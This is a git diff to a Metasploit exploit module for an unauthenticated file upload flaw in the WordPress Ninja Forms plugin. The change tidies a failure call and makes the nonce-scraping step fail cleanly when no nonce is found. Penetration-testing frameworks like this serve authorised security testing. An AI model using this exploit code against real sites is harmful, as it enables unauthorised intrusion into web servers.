diff --git a/modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb b/modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb
index ea20269ef1..15a045a743 100644
--- a/modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb
@@ -106,12 +106,18 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     unless res && res.code == 200
-      fail_with Failure::UnexpectedReply, "Unable to access FORM_PATH: #{datastore['FORM_PATH']}"
+      fail_with(Failure::UnexpectedReply, "Unable to access FORM_PATH: #{datastore['FORM_PATH']}")
     end
 
     form_wpnonce = res.get_hidden_inputs.first['_wpnonce']
 
-    res.body[/var nfFrontEnd = \{"ajaxNonce":"([a-zA-Z0-9]+)"/i, 1] || form_wpnonce
+    nonce = res.body[/var nfFrontEnd = \{"ajaxNonce":"([a-zA-Z0-9]+)"/i, 1] || form_wpnonce
+
+    unless nonce
+      fail_with(Failure::Unknown, 'Cannot find wpnonce or ajaxNonce from FORM_PATH')
+    end
+
+    nonce
   end
 
   def upload_payload(data)